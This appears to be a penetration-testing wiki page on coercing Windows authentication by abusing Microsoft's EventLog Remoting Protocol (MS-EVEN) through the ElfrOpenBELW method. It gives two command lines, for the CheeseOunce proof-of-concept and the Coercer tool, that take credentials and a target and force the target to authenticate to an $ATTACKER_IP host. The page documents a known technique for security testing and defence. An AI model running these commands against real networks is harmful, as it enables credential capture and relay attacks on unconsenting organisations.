search
Infiltr8ForumGitHub
githubEdit

MS-EVEN abuse (CheeseOunce)

hashtag
Theory

MS-EVENarrow-up-right is Microsoft's EventLog Remoting Protocol. It provides an RPC interface for reading events in both live and backup event logs on remote computers. That interface is available through \PIPE\eventlog SMB named pipe.

We can abuse this protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case, the ElfrOpenBELW method was detected vulnerable.

hashtag
Practice

CheeseOunce

The following Python proof-of-concept (https://github.com/evilashz/CheeseOuncearrow-up-right) implements the ElfrOpenBELW method.

python cheese.py $DOMAIN/$USER:$PASSWORD@$TARGET_IP $ATTACKER_IP

Coercer

Another alternative is to use the Coercerarrow-up-right tool (python) as follow.

coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-EVEN -l $ATTACKER_IP -t $TARGET_IP

hashtag
Resources

Logo[MS-EVEN]: EventLog Remoting ProtocolMicrosoftLearnchevron-right
LogoGitHub - evilashz/CheeseOunce: Coerce Windows machines auth via MS-EVENGitHubchevron-right

Last updated